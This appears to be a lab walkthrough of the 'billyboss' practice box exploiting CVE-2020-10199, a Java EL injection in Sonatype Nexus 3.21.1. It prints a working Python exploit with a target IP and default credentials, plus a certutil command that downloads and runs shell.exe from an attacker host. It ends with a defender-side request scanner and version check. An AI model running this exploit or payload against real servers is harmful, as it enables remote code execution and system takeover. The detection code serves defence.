CVE-2020-10199
A vulnerability was found in Sonatype Nexus Repository up to 3.21.1. It has been declared as critical. This vulnerability affects an unknown part of the component JavaEL Handler. The manipulation with an unknown input leads to an authorization vulnerability. The CWE definition for the vulnerability is CWE-862: the product does not perform an authorization check when an actor attempts to access a resource or perform an action. As an impact it is known to affect confidentiality, integrity, and availability.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ searchsploit -m java/webapps/49385.py ; mv 49385.py CVE-2020-10199.py
Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49385
Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
Codes: CVE-2020-10199
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/PEN-200/PG_PRACTICE/billyboss/49385.py
The exploit is available locally. However, it requires a small modification (target URL, command, and credentials) to fit the target environment.
Modification
#!/usr/bin/python3
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Homepage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
import sys
import base64
import requests

# Target Nexus instance, command to run on it, and the low-privilege credentials.
URL = 'http://192.168.148.61:8081'
CMD = 'cmd /c certutil.exe -urlcache -split -f http://192.168.45.245/shell.exe %TEMP%//shell.exe && %TEMP%//shell.exe'
USERNAME = 'nexus'
PASSWORD = 'nexus'

s = requests.Session()

# The rapture session endpoint expects base64-encoded username and password.
print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session', data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')

# The EL expression is placed in memberNames; the server reflects it into a
# validation message that gets evaluated as Java EL.
body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)
Modified to download and execute the payload
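As an added defender-side example, not part of the original exploit or this writeup: a version check against the patched release and a request-body inspector that flags EL syntax in the memberNames field of the group-repository endpoint the exploit above posts to. The conservative repository-name charset is an assumption, and the sample bodies are constructed, with a placeholder in place of a real command.

```python
import json
import re

# Patched release per the advisory cited above: 3.21.1 and below are affected.
FIXED_VERSION = (3, 21, 2)
# Openers for EL expressions: standard ${...} / #{...} plus the "$\A{" form used
# by the public exploit on this page.
EL_OPENER = re.compile(r'[$#]\\?[A-Za-z]?\{')
# Fragments that only appear when an expression is reaching for the JVM runtime.
RUNTIME_TOKENS = ('getClass()', 'forName(', 'java.lang.Runtime', '.exec(')
# Assumption: legitimate repository names use this conservative charset.
REPO_NAME = re.compile(r'^[A-Za-z0-9][A-Za-z0-9_.-]*$')


def is_vulnerable_version(version: str) -> bool:
    """True if a Nexus 3 version string (e.g. '3.21.1-01') is unpatched for CVE-2020-10199."""
    nums = [int(p) for p in version.split('-')[0].split('.')[:3]]
    nums += [0] * (3 - len(nums))
    return tuple(nums) < FIXED_VERSION


def scan_group_repo_request(path: str, body: str) -> dict:
    """Flag EL injection in memberNames of a group-repository create/update request."""
    result = {'path': path, 'suspicious': False, 'hits': []}
    if '/service/rest/' not in path or not path.rstrip('/').endswith('/group'):
        return result  # not the endpoint family this bug lives in
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return result
    if not isinstance(data, dict):
        return result
    for name in data.get('group', {}).get('memberNames', []):
        if not isinstance(name, str):
            continue
        if (EL_OPENER.search(name) or not REPO_NAME.match(name)
                or any(tok in name for tok in RUNTIME_TOKENS)):
            result['hits'].append(name)
    result['suspicious'] = bool(result['hits'])
    return result


# Constructed sample requests (not captured traffic); the command is a placeholder.
GROUP_PATH = '/service/rest/beta/repositories/go/group'
BENIGN_BODY = json.dumps({'name': 'go-group', 'online': True,
                          'group': {'memberNames': ['go-proxy', 'go-hosted']}})
MALICIOUS_BODY = json.dumps({'name': 'internal', 'online': True,
                             'group': {'memberNames': [
                                 "$\\A{''.getClass().forName('java.lang.Runtime')"
                                 ".getMethods()[6].invoke(null).exec('<command>')}"]}})

if __name__ == '__main__':
    for sample in (BENIGN_BODY, MALICIOUS_BODY):
        print(scan_group_repo_request(GROUP_PATH, sample))
```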